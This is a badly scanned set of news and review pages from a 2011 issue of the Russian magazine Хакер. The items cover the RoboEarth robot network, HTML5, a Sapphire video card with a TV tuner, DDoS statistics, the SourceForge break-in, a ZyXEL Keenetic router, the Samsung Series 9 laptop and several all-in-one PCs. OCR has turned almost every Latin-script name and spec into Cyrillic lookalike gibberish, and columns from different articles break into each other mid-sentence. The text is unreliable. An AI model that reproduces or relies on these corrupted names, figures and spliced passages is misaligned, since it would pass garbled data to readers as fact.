Это медицинский робот АМІОО. Пока команда изтридцати пяти человек 
тратитогромныеусилия и море времени нато, чтобы обучитьего про- 
стейшим вещам, но все, чему научится АМІОО, впоследствии смогут 
легко скопировать из ВоЬоЕагіЬ другие аналогичные машины. Словом, 



И 



игр с использованием НТМР5. Реальные 
кейсы крупных компаний добавляют 
оптимизма и смелости для использова- 
ния новых фишек. Тем более, что уже в 
мае 201 1 года НТМР5 приобретет статус 
ѴѴогкіпд ЭгаИ Разі Са II, а к 201 4 году будет 
окончательно принят в качестве рекомен- 
дации ѴѴЗС. Кстати, узнать подробнее о 
разных статусах и пути от одного к другому 
ты можешь из еще одного доклада НТМР5 Сатр. Все выступления до- 
ступны в записи на сайте тісгозоІІ.сот/ги-ги/еѵепІз/ЬітІбсатр . 





выгода налицо, а начало в виде первых полезных мегабайтинформации 
уже положено. Разработчики прогнозируют, что благодаря ВоЬоЕагіЬ 
через семь-десять лет мы получим вполне работоспособные, а главное 
— независимые отчеловека машины. Кстати, поминать«Скайнет» и 
готовиться к восстанию машин пока еще рано — сеть полностью авто- 
номная, и за ней внимательно следятлюди :]. 



ХАКЕР 04 /147/ 201 1 



► Оіз 



МЕ6АЫЕШ5 



КАОЕ(Ж НО 5570 СО ВСТРОЕННЫМ ТВ-ТЮНЕРОМ 



Думаю, многие наши читатели помнят славные времена, когда на рынке 
было представлено немало видеокарт со встроенными ТВ-тюнерами. Та- 
киедевайсы былиудобны и полезны, но потом тенденции рынка смени- 
лись, и подобные гибриды стали почти вымирающим видом. Для тех, кто 
соскучился, хорошие новости: компания Заррбіге решила тряхнуть ста- 
риной и представила «комбайн» 5АРРНІРЕ НО 5570 ХіепсІТѴ. Для начала 

0 самом тюнере — это мульти стандартный программируемый ТѴ-тюнер 
Мігісб РІехіТѴ, способный принимать теле- и радиосигналы в стандарте 
ОѴВ-Т. Также, как и с обычным ТВ-тюнером, можно просматривать теле- 
передачи на компьютере с использованием Мебіа Сепіег — записывать, 
сохранять и воспроизводить программы по собственномужеланию. Но 

в комплекте с 5АРРНІРЕ НО 5570 ХіепбТѴ также поставляется ПО Мігісб 
ЕІехіЗітеат и мощный ДУ на 49 кнопокс приемником для порта 115В 2.0. 

С их помощью любой компьютер с новым «комбайном» отЗаррбіге на 
бортулегко превращается в сервер, транслирующий видео (можно в 
записи, можно «вживую»]. Используя клиент ХіепбТѴ, можно просматри- 
ватьтрансляцию в любом месте земного шара. Обсчет видеопотока при 
этом ложится на ОРІІ, а это Рабеоп НО 5570 с памятью ООБП5 объемом 

1 Гб.такчто проблем не будет. Карточка оснащена видеовыходами БѴІ 

и НОМІ, а за охлаждение отвечает однослотовый кулер активного типа с 
одним вентилятором. Ксожалению, цена устройства пока не известна, 
но, исходя изтого, что нам известно о компании Заррбіге, релиза не при- 
дется ждать долго, а цена вряд ли будетзавышена? 




» В своем ежегодном отчете компания АгЬог Иеіѵѵогкз сообщила, что в 2010 
году 00о5-атаки достигли невиданной ранее мощности: около 100 Гбит/с. 
Эта цифра более чем в два раза превышает показатели 2009 года! А ведь дальше 
будет хуже. 



501ШСЕЕ0К6Е ВЗЛОМАН 



Г іпеі. сгрдіг, лпЛ риЬЬѵГі Прел Ъоипр- ідІІчил-г Гог Ггн 




Тебе наверняка знаком крупнейший и некогда самый популярный хо- 
стинг открытых проектов ЗоигсеЕогае.пеТ Быть может, ты даже заметил, 
что недавно он испытывал некоторыетехническиетрудности. Если 
говоритьточнее, администрация проекта была вынуждена временно от- 
ключить СѴЗ-репозитории, ѵѵеЬ-интерфейс для просмотра кода (ѴіеѵѵѴС) 



и систему загрузки релизов, а также сервис интерактивного збеИ в 
системе Рго]ес1:ѴѴеЬ. Произошло это отнюдь не из-за плановых работ 
или какого-то сбоя, а в результате хакерской атаки. Кстати, помимо упо- 
мянутых мер был произведен и сброс всех паролей для всех аккаунтов 
зоигсеіюгде.пеі — подозрения по поводуутечки пользовательской базы 
тоже имелись. В итоге на полную проверку и восстановление всех серви- 
совушло более двух недель. Таккакодним из наиболее вероятных моти- 
вов атаки было названо намерение поместить вредоносный код в архив 
с релизом какого-то популярного проекта, контрольные суммы всех (!) 
проектов тоже перепроверили. Выяснилось, что никакого существенно- 
го ущерба проекту хакеры всеже нанести неуспели, зато они оченьярко 
продемонстрировали публике, почему ЗоигсеЕогде в последнее время 
сдает позиции. Одна из главных причин —устаревшее ПО: некоторые 
сервисы (СѴ5 и ѴіеѵѵѴС] разработаны более десяти лет назад! Впрочем, 
урок, похоже, усвоен. Администрация проекта заявила, что безопасность 
инфраструктуры Зоигсеіюгде.пеі будет пересмотрена и усилена, а кроме 
того — регулярно будут проводиться различные профилактические 
меры. Это, конечно, хорошо, но врядли эти меры позволят ЗоигсеЕогде 
угнаться за своими молодыми конкурентами в лице, скажем, ОііНиЬ и 
Ооодіе Собе. 



► 014 
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Энергия Кинетика 



В одном из наших номеров, в статье 
«І_еѵеІ-ир для точки доступа», мы 
делились секретами, как из рядового 
беспроводного роутера, который мало 
на что способен, кроме как просто 
раздавать по квартире инет, можно 
сделать многофункционального 
монстра с поддержкой ІІ5В-принтеров, 
толковым торрент-треккером и 
возможностью раздавать файлы 
с подключенного внешнего диска. 

Тогда для этого пришлось искать 
альтернативную прошивку от 
энтузиастов, ковыряться в конфигах 
встроенного І_іпих’а и настраивать весь 
недостающий для наших задач софт. 
Времена меняются. В продвинутых 
домашних устройствах все эти опции, 
ради которых раньше приходилось 
порядком заморочиться, теперь 
доступны и готовы к употреблению 
просто так — прямо из коробки, и даже 
подробно описаны в Мануэле. Один из 
первых девайсов такого ранга недавно 
представила компания 2уХЕІ_ — это 
модель Кеепебс со встроенной І_іпих- 
платформой N0145. 




© Всеядность по провайдерам. 

До сих пор помню, как каждый раз искал 
строчку вроде «потрре потррс тахіаіі О 
боШоб 60» для дополнительной настройки 
рррсі-демона. Без нее РРТР-соединение 
не устанавливалось, хоть ты тресни. В этом 
плане особенно радует универсальная 
настройка подключений в Кеепебс: преду- 
смотрены все мыслимые протоколы и нюан- 
сы авторизации, в том числе 802. IX, и даже 
возможность подключения на базе ѴІ_АІ\Гов 
(идея подключения по 802. Ш не умерла и до 
сих пор культивируется некоторыми провай- 
дерами). Роутер «оттюнингован» для работы 
в сетях ведущих российских провайдеров: 
скорость маршрутизации через РРТР и І_2ТР 
— до 90/70 Мбит/с, через РРРоЕ и ІРоЕ — до 
95 Мбит/с. 



Ѳ Легкое подключение как по ЕЖегпе*, 
так и через 30/40-модем. 

Сложно забыть, сколько заморочек еще 
недавно было с тем, чтобы заставить рабо- 
тать 30-адаптер (к тому же залоченный на 
одного оператора) с моим беспроводным 
роутером. Для этого потребовался целый 
набор хаков. В случае с Кеепебс самые 
разные варианты подключения к глобаль- 
ной сети продуманы с самого начала. В 
частности, из коробки поддерживается 




_____ ___ 



более 30 моделей ІІ5В-модемов мобильно- 
го интернета 30 и 40, даже мало кому под- 
давшийся біпдіе отѴоІа. 

© Поддержка беспроводной сети 802.1ІП. 

Еще недавно казалось, что устройства с 
поддержкой нового стандарта ѴѴі-Рі появят- 
ся у меня не скоро, и он особо не нужен. В 
действительности уже почти все ноутбуки 
поставляются с обновленными беспровод- 
ными модулями. Скорость передачи данных 
802.1 1 п составляет до 300 Мбит/с. Это тео- 
рия. Но на деле мы получаем скорость, 
сравнимую со старым добрым 100-мегабит- 
ным Еібегпебом, и это на уровень выше 
обычного 802.1 1 д! Полезная добавка — 
режимы маршрутизируемого и мостового 
подключения по ѴѴі-Бі. 

Многофункциональный хост 115В. 

К Кеепебс можно подключить моде- 
мы, принтеры и внешние накопители. 
Последнее особенно полезно для работы 
торрент-клиента. Проблемой здесь могла 
бы стать необходимость форматировать 
накопитель под файловую систему, которую 
понимает встроенный Ыпих точки. Ноу 
продвинутых моделей вроде Кеепебс’а есть 
встроенная поддержка всех необходимых 
файловых систем ( ЕАТ / ЕАТ 32/ЕХТ2/ЕХТЗ/ 
ІЧТБ5) , а также протоколов 5МВ и ЕТР 
(любые шары прямо с устройства). 



© Встроенный торрент-клиент. 

Возможностью загрузки файлов с торрентов 
некоторые беспроводные интернет-центры 
могли похвастаться уже давно, но их встро- 
енные клиенты были абсолютно непригод- 
ны для использования. Очевидным реше- 
нием была самостоятельная настройка 
любимого ТгапзппІББІоп со всеми вытекаю- 
щими проблемами в настройках. И вот, 
наконец-то вендоры сетевого оборудования 
поняли, что это они должны делать сами :). 
Добавлять новые закачки теперь возможно 
откуда угодно! 

© Сетевая печать на ІІЗВ-принтере. 

Подключить принтер к одному из компьюте- 
ров и сделать его доступным для других 
машин — прошлый век. Пару лет назад я 
подключил принтер к роутеру и до сих пор 
не нарадуюсь такому подходу. Что может 
быть лучше: интернет-центр всегда вклю- 
чен — соответственно всегда доступна и 
сетевая печать с любого устройства.. 
Кеепебс поддерживает почти все принтеры 
кроме ООІ-моделей. 

© Аппаратная поддержка 
ІР-телевидения. 

Провайдеры в качестве дополнительной 
услуги теперь поголовно предлагают циф- 
ровое ТВ. И длинные инструкции по его 
настройке. В случае с Кеепебс чаще всего 
можно вообще обойтись без дополнитель- 
ного конфигурирования и сразу получить 
«картинку» на компьютере, ресивере ІРТѴ 
или ноуте по ѴѴі-Бі. ІРТѴ поддерживается 
автоматически по умолчанию и самым уни- 
версальным образом. Только если требуется 
выделить для приставки порт (чтобы роутер 
вообще не испытывал нагрузки) — можно 
выбрать другой режим. 

© Улучшенная безопасность. 

Последний пункт, но не последний по важ- 
ности. Каждый, кто обзавелся дома марш- 
рутизатором, замечал, что необходимость 
устанавливать файрвол на клиентских 
машинах с этого момента пропадает. 

Все лишнее фильтруется на аппаратном 
уровне. В Кеепебс встроен межсетевой 
экран 5РІ с защитой от ООоЗ-атак. 

К тому же роутер может похвастаться тех- 
нологией ѴѴі-Рі Ргоіесіеб Эеіир (ѴѴР5) для 
быстрой настройки защищенной сети ѴѴі-Бі 
и подключения беспроводных устройств. 
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РЕВВІІМ 



I Сергей Мельников 



Инфраструктура 

в сумке 

Тестирование ноутбука Батзипд 9-й серии 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Дисплей: 13.3", 1366x768, І_ЕО-подсветка, 16 млн цветов 
Яркость: 400 нит (кд/м2), технология БирегВгідЫ Ріиз 
Процессор: Іпіеі Соге І5-2537М, 1.4 ГГц 
Чипсет: Іпіеі НМ 65 

Оперативная память: О ОРЗ 4 Гб 
Видеокарта: Іпіеі НО ОгарЫсз 3000 
Накопитель: 550 128 Гб 

Сеть: Віиеіооіб 3.0, ѴѴі-Рі 802.1 1п 

Разъемы ноутбука: 115В 3.0, ІІБВ 2.0, тісго НОМІ, НР, ридер 
МісгоБО 

Дополнительно: веб- камера 
Батарея: 46 Вт*ч (до семи часов работы) 

Размеры: 328х227х~16 мм 
Масса: 1.31 кг 

Если ты хоть раз покупал ноутбук, то точно знаешь, сколько мерз- 
кого фирменного софта приходится потом сносить. В большинстве 
лэптопов, от компактной бизнес-модели до домашнего медиамон- 
стра, установлен совершенно бесполезный софт вроде тормоз- 
ных проигрывателей, непонятных фото библиотек, неработающих 
апдейтеров, а то и вовсе рекламных приложений. Случай, когда 
программа от производителя бука может действительно пригодить- 
ся, можно считать из ряда вон выходящим. Так что тем более круто, 
когда такой софт предоставляет действительно новые возмож- 
ности. Так Батзипд 9-й серии позволяет интегрировать ноутбук с 
остальным имеющимся железом - например, другим компьютером 
и телефоном. Без труда и мороки отправлять через компьютер 5М5 
и ММ5 с телефона или использовать телефон в качестве модема. 
Ну вот, считай, ты прочел краткое описание софта из ноутбука 
Батзипд 9-й серии. И это отнюдь не главное его достоинство! 
Батзипд серии 9 - самый тонкий тринадцатидюймовый ноутбук 
в мире. Коли попытаешься возразить, напомним, что то, о чем ты 
хотел сказать, имеет толщину 17 мм, а новинка Батзипд - 16. 

Вау-фактор 

Первый «вау!» испытываешь, когда открываешь коробку с ноут- 
буком - не обычный картон из вторсырья, а красивый черный 
кейс с металлизацией. Второй «вау!» — сам ноутбук. Кажется, что 
его корпус сделан из цельного согнутого листа металла. Металл, 
кстати, - не алюминий. Батзипд заверяет, что это самый что ни 
на есть дюралевый сплав, применяемый в авиастроении. Такой 
сплав имеет в несколько раз большую прочность, чем обычный 
алюминий, при сохранении того же веса. Охотно верим, потому что 
классической проблемы сверхтонких ноутбуков (пальцем можно 
продавить крышку до матрицы) Батзипд 9-й серии лишен - как 
ни давили, никаких разводов по экрану не пошло. Значит, даже 
в сумке с кучей стаффа ноутбук останется цел (+100500 к броне - 



веский аргумент для камрадов, носящих ноутбук в тесном рюкзаке). 
Третий «вау!» — организация портов. Если уж делать ноутбук 
стильным, то стильным во всем. Поэтому в Батзипд 9-Й серии все 
разъемы на торцах находятся в откидывающихся крышечках - по 
одной слева и справа. Если в тесном рюкзаке, помимо ноутбука, ты 
носишь месячный запас дошираков и булок, то можешь быть уверен, 
что весь этот мусор не забьется в порты. 

Впрочем, жевать кексы над клавиатурой тоже не стоит - жалко же! 
Клавиатура не только страсть как удобна, но еще и снабжена катод- 
ной подсветкой, которая включается автоматически в условиях сла- 
бой освещенности. 

С тачпадом можно быть более беспощадным, ибо тот мало того, что 
огромных размеров, так к тому же покрыт не пластиком, а стеклом. 
Благодаря этому его поверхность не отполируется со временем (как 
часто бывает у дешевых ноутбуков). Эпический дестрой этому тачпа- 
ду можно устроить разве что стеклорезом. Надеемся, никто из твоих 
знакомых не носит с собой подобный инструмент. 

Песнь дружбы 

Разъемов в Батзипд 9-Й серии, в общем-то, немного, и все они 
необычны. На каждом из боков находятся по одному ІІБВ, причем 
один из них третьей версии. Для владельцев телефонов с разъемом 
под флешки пригодится встроенный кард-ридер МісгоБО - выглядит 
очень необычно. Місго НОМІ тебе вряд ли понадобится, но если 
вдруг -докупи недорогой переходничок на полноразмерный разъ- 
ем. Самый необычный порт, назначение которого сразу понять не 
получается, - НР. На деле это проприетарный разъем Еібегпеі - 
места для огромной дыры РЮ45 не хватило, поэтому ее вынесли на 
отдельный переходник, который идет в комплекте с ноутбуком. Влить 
Батзипд 9-й серии в любую сеть получится на максимальных скоро- 
стях - тут тебе и гигабитный ЕНаегпеС и ѴѴі-Рі 802.1 1 п. К использова- 
нию проводной гигабитной сети очень располагает 550-драйв, уста- 
новленный в ноутбуке вместо НОБ - такая связка даст максималь- 
ные скорости. Завершает парад беспроводных технологий Віиеіооіб 
3.0, как нельзя более подходящий для связи с мобильником. 

Достижения народного хозяйства 

Надеемся, ты в курсе, что в январе Іпіеі выпустила новое поколение 
процессоров Бапсіу Вгісіде. Помимо уменьшившегося до 32 нм тех- 
процессора, новые Іпіеі Соге І5-2537М получили встроенное видеоя- 
дро. Погоди плеваться! Чип Іпіеі ИВ ОгарЫсз 3000 по уровню произ- 
водительности находится примерно на той же ступени, что и ІЧѴЮІА 
ОеЕогсе ОТ 320М, ІЧѴЮІА ОеЕогсе ОТ 420М и АМО Рабеоп НО 6470М 

- одних из самых ныне популярных интегрированных мобильных 
видеокарт. Сил чипа хватит на то, чтобы погонять в любую совре- 
менную игру при средних настройках графики на играбельном ЕР5 

- что-то около 40. В паре с шустрым процессором трудится не менее 
шустрый 550-драйв, скоростной, но малоемкий - всего 128 Гб. Не 
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слишком много, хватит только на ѴѴіпсІоѵѵз, софт и необходимые 
файлы. Для медиатеки или игр лучше завести себе внешний НйО. 
Но, пожалуй, главным достижением Затзипд (к слову, одного из 
крупнеших производителей ЖК-матриц) является экран ноутбука. 
Во-первых он обладает просто чумовой яркостью в 400 нит - такого 
запаса хватит, чтобы выжигать врагам партии глаза. Во-вторых, 
экран отличается зверской цветопередачей: 16 млн цветов. Для 
матрицы ТЫ+ЕіІт это крайне необычно. Благодаря этому цветовой 
охват экрана практически равен охвату зРОВ - владельцы недо- 
рогих настольных мониторов (не говорим про владельцев ноутбуков) 
нервно грызут ногти и завидуют. Пруфы с графиками, полученными с 
помощью калибратора ЗрусІегЗ, прилагаются. 

Соль в софте 

Затзипд 9-й серии поставляется с несколькими фирменными про- 
граммами Затзипд. Не спеши удалять их, они могут пригодиться! 
Самая примечательная из них - РЬопеЗЬаге. Если злые люди 
вывезли тебя далеко за город копать картошку, оторвав тебя от 
поднятия упавшего сервера, то ты все равно сможешь вернуться к 
важному делу, выйдя в интернет через телефон. И мы говорим не 
про Іеіпеі-клиент для мобильника - Затзипд РЬопеЗЬаге позволяет 
на раз-два сделать из телефона 6РР8-модем для ноутбука. Там, где 
даже электричество - редкость, такая штука может очень пригодить- 
ся. Кроме того, возможен и обратный процесс - если у тебя на рабо- 
те странные админы не хотят создавать ѴѴІ-Рі вещание, то ноутбук с 
помощью той же РЬопеЗЬаге можно будет превратить в беспровод- 
ную точку доступа, стоит лишь подключить кабель ЕіИетеЕ Из бону- 
сов - отправка ММ3 и 5М5 через компьютер с телефона. 

Для адептов медиаглобализации в ноутбуке есть поддержка функции 
Затзипд АИЗЬаге - это продвинутый аналог РЕЫА, позволяющий 
устраивать трансляцию медиаконтента в реальном времени между 




Цветовой охват экрана почти соответствует диапазону 
$В6В — редкий результат даже для настольных 

мониторов 




Кривые цветокоррекции не сильно отклонились 
от диагонали — значит цветопередача близка к 

идеальной 

различными устройствами: ноутбук, телефон, телевизор, видеока- 
мера и так далее. Причем настройка проходит просто, быстро и без 
заморочек - главное преимущество фирменных технологий в отличие 
от открытых стандартов, где порой приходится станцевать румбу с 
бубном и выругаться всем синтаксисом ассемблера. Однако полная 
совместимость с обычным ОІ_ЫА у технологии присутствует. Как это 
работает? Пришел к другу с ноутбуком, подключился к сети, выбрал 
в ноутбуке подключенный к этой сети телевизор и без труда начал 
проигрывать на нем фильмы. Все делается в пару кликов. 

Напоследок упомянем про программно-аппаратный комплекс (вот, 
как извернулись!) оптимизации цвета. За этим страшным названием 
скрывается всего лишь датчик освещенности и умный софт. Датчик 
улавливает смену внешнего освещения и регулирует подсветку 
экрана. А софт, обнаруживая запущенный плеер с видеороликом, 
автоматически подключает графический профиль с увеличенным 
контрастом и насыщенностью. 

Ве сооі 

Затзипд серии 9 оставляет исключительно приятные впечатления 
- он тонкий (чего уж там — самый тонкий), легкий, яркий и почти 
не греется. Куда ни ткни — везде высокоскоростные интерфейсы. 
Пальцы радуются тачпаду, глаза - экрану, а душа - полезному софту. 

С таким ноутбуком можно как минимум безопасно ходить в институт, 
как максимум - выбираться «на картошку» в Кировскую область, 
оставаясь онлайн. Во всех случаях лэптоп не оттянет сумку и не сде- 
лает бэкпэк похожим на рюкзак с парашютом. Ноутбуком не стыдно 
похвастаться перед друзьями - по крайней мере, он впечатлит их 
больше, чем модные-до-тошноты «маки». Да и цена за все удоволь- 
ствие обещает быть невысокой - чуть более полутора тысяч долларов. 
Учитывая ценники на другие ультратонкие ноутбуки, это совсем даже 
немного, т 
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Тестирование моноблоков 

• Если ты не любишь выбирать мониторы, то наилучшее решение для 
тебя - это моноблок. Такие девайсы обладают массой плюсов, и один из 
важнейших - компактность. Поэтому сейчас все идет к тому, что 
классические настольные компьютеры становятся уделом энтузиастов- 
железячников, а простые пользователи переходят на более актуальные 
устройства. 

Технологии 

Моноблок — это объединенные в одном корпусе несколько видовтехники. 

В нашем случае это системный блоки монитор. Получившееся устрой- 
ство занимает меньше места, проще устанавливается и такдалее. По 
большому счету, протестированные нами моноблоки мало в чем уступают 
обычным ПКпо функционалу, а в плане коммуникаций даже несколько 
превосходят их — не в каждом системном блоке можно найти адаптеры 
ѴѴі-Рі и ВІиеТооТЬ. Крометого, плюсом некоторых моноблоков является 
наличие у них сенсорных дисплеев — мало того, что поначалу это очень 
весело, так ктому же существуют задач и, которые действительно удобнее 
выполнять пальцами, а не мышью. Для обычныхже настольных компьюте- 
ров сенсорный дисплей пока редкость. Впрочем, каки специальныежи- 
роотгалкивающие дисплеи — еще один плюс моноблоков, ведь отпечатки 
пальцев на экране выглядят не слишком эстетично. Впрочем, чистящие 
салфетки сегодня отнюдь не дефицит. 

Методика тестирования 

Таккакмоноблоки призваны заменить собой настольный компьютер, то 
мы не стали делать особых различий и нагружали устройства обычными 
тестами для ПК. Ктаким бенчмаркам относятся синтетические ЗОМагк 
06, ЗОМагк ѴапТаде и РСМагк ѴапТаде. Крометого, производительность 
процессора и оперативной памяти проверялись встроенными тестами 
архиваторов ѴѴіпВАВ и 72ір. Скорость работы процессора легко оценить 
при помощи популярной программы ЗирегРі — мы замеряли время вы- 



числения миллионногознака послезапятой в числе«Пи». Ну и напосле- 
док проводили игровой тест Са II о^иагег. 

Не меньше вниманияуделялось итаким важным для любого покупателя 
параметрам, какдизайн и эргономика — мытщательно отслеживали, 
насколько удобно пользоваться клавиатурой и мышью из комплекта. 
Также оценивалась акустика и количество интерфейсов, расширяющих 
функционал. Завершающим тестом было снятие параметров монитора 
при помощи колориметра. 

Таккаквсе компьютеры, кроме Арріе іМас, работаютпод управлением 
ѴѴіпсІоѵѵз 7, мы не стали упоминать об этом в характеристиках. 



список 

ТЕСТИРУЕМОГО 

ОБОРУДОВАНИЯ 

Асег Азріге А23751 
А51ІЗ ЕЕЕТор ЕТ2010А6 1В 
Арріе іМас 

НР ТоисНЗтагІ 600-1220ги 
Іепоѵо ШеаСепІге А700 
ЗопуѴАІОѴРШЗМІК 
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Асег 

Азріге А23751 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ДИСПЛЕЙ: сенсорный 21.5", 1920x1080 
ПРОЦЕССОР: Іпіеі Соге іЗ-540, 3.06 ГГц 
ЧИПСЕТ: I піеі Н57 Ехргезз 

ВИДЕОАДАПТЕР: І\ІѴЮІА6еРогсеОТ320, 1 Гб выделенной памяти 

ОПЕРАТИВНАЯ ПАМЯТЬ: 4 Гб ОШЗ, 2х5СЮІММ 
ЖЕСТКИЙ ДИСК: 5АТА 1 .5 Тб (7 200 об/мин! 

ОПТИЧЕСКИЙ ПРИВОД: Віи-гау (чтение) 

СЕТЕВЫЕ ИНТЕРФЕЙСЫ: 1 0/1 00/1 000 бідаЬіі ЕІМегпеі ЕАІМ, ѴѴІ-ГІ 
802.11 Ь/д/п, ВІиеІооІН 2.1 ЕйР 

ДОПОЛНИТЕЛЬНО: кардридер 6-в- 1 , аудиовход (стерео], ТВ-тюнер 
(аналоговый и ОѴВ-Т) 

ПОРТЫ: 6 портов 115В 2.0 (2 сбоку], НЮМІ, ГігеѴѴіге 400, 2х аудиовыход, 2х 
аудиовход 

ГАБАРИТЫ: 496x549x129 мм 

ВЕС: 6 кг 

■■■■■■■■■□ 

+ 

Внешний вид устройства традиционен для компании Асег — тонкий 
и стильный корпус. Тем не менее, несмотря на компактные габариты, 
девайс снабжен всеми возможными сетевыми адаптерами, а также не- 
плохой встроенной ѵѵеЬ- камерой, так что проблем с коммуникациями у 
тебя не возникнет. В комплект поставки входятТВ-тюнер, беспроводные 
мышьи клавиатура. Кстати, на мониторе (между экраном и колонками] 
есть сенсорная подсветка, которая подсвечивает в темноте клавиатуру. 
Яркость регулируется с помощью касания. Экран также сенсорный, при- 
чем поддерживаетдва одновременных касания, что оченьудобно. Во 
всехтестах, включая колориметрическоетестирование, моноблокАсег 
показал себя оченьхорошо. 

Ксожалению, на сенсорном дисплее остаются следы от пальцев. 
Конструктивный недостаток: микрофон смонтирован рядом с камерой, 
но рядом затесалось еще и выходное отверстие системы охлаждения. В 
результате шум от нее перекрывает голос. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ДИСПЛЕЙ:27", 2560x1440 
ПРОЦЕССОР: Іпіеі Соге І5, 2.8 ГГц 

ЧИПСЕТ: п/а 

ВИДЕОАДАПТЕР: АТІ Вабеоп НО 5750, 1 Гб выделенной памяти 
ОПЕРАТИВНАЯ ПАМЯТЬ: 4 Гб ООВЗ, 2х5СЮІММ 
ЖЕСТКИЙ ДИСК: 5АТА 1 Тб (7 200 об/мин) 

ОПТИЧЕСКИЙ ПРИВОД: слотовый йѴО ЗирегМиШ 
СЕТЕВЫЕ ИНТЕРФЕЙСЫ: 1 0/1 00/1000 ѲідаЬІІ ЕіЬегпеІ І_АІ\І,ѴѴІ-РІ 
802.11 Ь/д/п, ВІиеІооІЬ 2.1 ЕйР 
ДОПОЛНИТЕЛЬНО: кардридер 2-в- 1 , аудиовход 
ПОРТЫ: 4х 115В 2.0, Міпі ОізрІауРогІ:, ГігеѴѴіге 800, аудиовыход, аудиов- 
ход, оптический 5/РЭІГ 
ГАБАРИТЫ: 51 7x650x207 мм 
ВЕС: 13.8кг 

ВНЕ КОНКУРСА 

+ 

Ничего не скажешь, дизайнеры и инженеры компании Арріе умеют 
работать. Когда мы распаковали это устройство и увидели вблизи его 
огромный 27-дюймовый экран, нам сразуже захотелось посмотреть на 
нем какой-нибудь зрелищный фильм, причем в отличном разрешении 
2560x1440. Когда мы это сделали, то обнаружили, что встроенные колонки 
весьма неплохи. Имеется веб-камера. Легко пользоваться беспроводны- 
ми мышьюи клавиатурой — они начинают работать сразу, нетребуя ника- 
кой синхронизации. Кстати, мышь Мадіс Моизе, у которой вся поверх- 
ность сенсорная, оказалась оченьудобной. Да и вообще работа с Мае не 
вызвала у нас никаких вопросов — после ѴѴіпсІоѵѵз во всем разбираешься 
и ко всему привыкаешьоченьбыстро. 

Все интерфейсы собраны на задней панели — подключать кабели не 
глядя будеттяжеловато. Щелевой оптический привод не позволяет 
использовать 80-миллиметровые диски — они просто бесследно в нем 
исчезают. Так как наши тесты не работают под Мас05,то и результатов 
тестирования мы не имеем. 
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5опу 

ѴАіо ѵрсизмір 



НР ТоисИЗтагі 1 
600-1 2 20ги 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ДИСПЛЕЙ: сенсорный 24 ", 1920x1080 
ПРОЦЕССОР: Іпіеі Соге 2 Оио Е7500, 2.93 ГГц 
ЧИПСЕТ: Іпіеі Р43 Ехргезз 
ВИДЕОАДАПТЕР: ЫѴЮІАбеРогсе 6Т330М 

ОПЕРАТИВНАЯ ПАМЯТЬ: 4 Гб ООР2, 2х$СЮІММ 
ЖЕСТКИЙ ДИСК: ВАТА 1 Тб (7200 об/мин) 

ОПТИЧЕСКИЙ ПРИВОД: ОѴО ЗирегМиШ 

СЕТЕВЫЕ ИНТЕРФЕЙСЫ: 1 0/1 00/1 000 бідабіі ПНете* ЕАІ\І,ѴѴі-Еі 

802.11 Ь/д, ВІиеІооІЬ 2.1 ЕБВ 

ДОПОЛНИТЕЛЬНО: кардридер 6-в- 1 , аудиовход 

ПОРТЫ: 5 портов 115В 2.0, ЕігеѴѴіге 400, В/РОІЕ 

ГАБАРИТЫ: 429x190x582 мм 

ВЕС: 12.5 кг 

■■■■■■■■■□ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ДИСПЛЕЙ:сенсорный 23", 1920x1080 
ПРОЦЕССОР: Іпіеі Соге І5-430М, 2.26 ГГц 
ЧИПСЕТ: Іпіеі НМ57 

ВИДЕОАДАПТЕР: ІЧѴЮІА беЕогсе 6Т 230М 

ОПЕРАТИВНАЯ ПАМЯТЬ: 4 Гб ООВЗ, 2хВООІММ 
ЖЕСТКИЙ ДИСК: ВАТА II 1 .5 Тб (7200 об/мин] 

ОПТИЧЕСКИЙ ПРИВОД: слотовый Віи-гау (чтение] 

СЕТЕВЫЕ ИНТЕРФЕЙСЫ: 1 0/1 00/1 000 бідаЬіі ЕІМегпеі І_АІ\І, ѴѴІ-ЕІ 
802.11 Ь/д/п, ВІиеІооІМ 2.0 ЕйВ 

ДОПОЛНИТЕЛЬНО: кардридер 6-в- 1 , антенный вход, разъем 5-ѵібео, 
аудиовход, выход ИК ІР Ыазіег, НОМІ и композитный видеовход, ТВ- 
тюнер (аналоговый и ОѴВ-Т), МРЕО 4, пульт ДУ НР ѴѴіп7 Мебіа Сепіег 
ПОРТЫ: 5х 115В 2.0, 5/РОІР 
ГАБАРИТЫ: 583x1 26x451 мм 
ВЕС: 12 кг 



+ 



Дизайнеры Вопу решили отойти от плавности в дизайне и создали моно- 
блок, состоящий из прямых линий и острыхуглов. Получилось неплохо, к 
тому же приподнятый дисплей делает корпус визуально легче. Дисплей 
сенсорный, поддерживаетдва одновременных нажатия. 

В отличие отучастников со щелевым оптическим приводом, данный 
девайс может работать со всеми типами и размерами СО и ОѴО. Бес 
проводные мышьи клавиатура неплохи (правда, мышь великовата по 
размеру — это даже удобно для крупной мужской ладони, но выглядитне 
очень изящно]. Компоненты производитель выбрал неплохие, поэтому на 
моноблоке вполне можно будет поиграть, производительности хватит. А 
для тех, кто заботится об экономии электричества, предусмотрена кнопка 
принудительного выключения экрана. 

Несмотря на хорошие результаты в тестах, все-таки процессор I пЕеІ Соге 
2 Био — устаревшая модель. Запас скорости у него невелик. 
Традиционный конструктивный недостаток не обошел и эту модель — 
микрофон глушится звуками системы охлаждения из-за их близкого 
расположения. 



+ 

Качество сборки впечатляет. Например, вроде бы мелкая деталь — 
панель с разъемами прикрыта крышечкой с отверстиями для проводов, 
но насколько же она улучшает экстерьер и делает внешность устройства 
аккуратнее! С беспроводностьютутвсе неплохо: присутствуют адаптеры 
ВІиеІооіЬ и ѴѴі-Бі, а клавиатура и мышь работают без хвостов, причем 
на большом расстоянии. Имеется и пульт дистанционного управления, 
правда, адаптер для приема его сигналов не встроенный, а требует под- 
ключения. Учитывая наличиеТВ-тюнера, пульт будет совсем нелишним. 
Дисплей сенсорный, причем поддерживающий несколько одновремен- 
ных касаний. Крометого, устройство можно использовать и в качестве 
внешнего дисплея — например, при подключении игровой приставки. 
Монитортакже оснащен ѵѵеЬ-камерой с регулируемым наклоном и светя- 
щейся полосой для подсветки клавиатуры. 




Корпус и дисплей коллекционируюттвои отпечатки пальцев, внешний 
адаптер питания мешается на столе, а щелевой оптический привод не 
будет работать с 80-миллиметровыми дисками. 
